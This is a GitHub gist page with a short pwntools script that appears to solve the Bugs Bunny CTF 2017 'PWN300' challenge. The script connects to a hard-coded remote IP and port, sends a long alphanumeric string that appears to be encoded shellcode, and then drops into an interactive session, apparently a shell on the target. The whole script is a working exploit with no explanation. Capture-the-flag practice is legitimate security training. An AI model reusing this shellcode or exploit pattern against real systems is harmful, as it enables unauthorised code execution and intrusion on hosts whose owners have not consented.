Skip to content

Instantly share code, notes, and snippets.

@0xPwny
Created July 31, 2017 11:26
Show Gist options
  • Save 0xPwny/e0cf3643e32a888dd8a8423945630bb7 to your computer and use it in GitHub Desktop.
Save 0xPwny/e0cf3643e32a888dd8a8423945630bb7 to your computer and use it in GitHub Desktop.
Bugs Bunny CTF 2017 - PWN300
from pwn import*
io = process("./pwn300")
io = remote("54.153.19.139",5256)
io.sendline("Rh0666TY1131Xh333311k13XjiV11Hc1ZXYf1TqIHf9kDqW02DqX0D1Hu3M15103e0y4s3c1n0x0H8K2D1K3L7N2l0Y2v7O0g0K2C0e2l5L0w2w14164x0z1m3r0V070v")
io.interactive()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment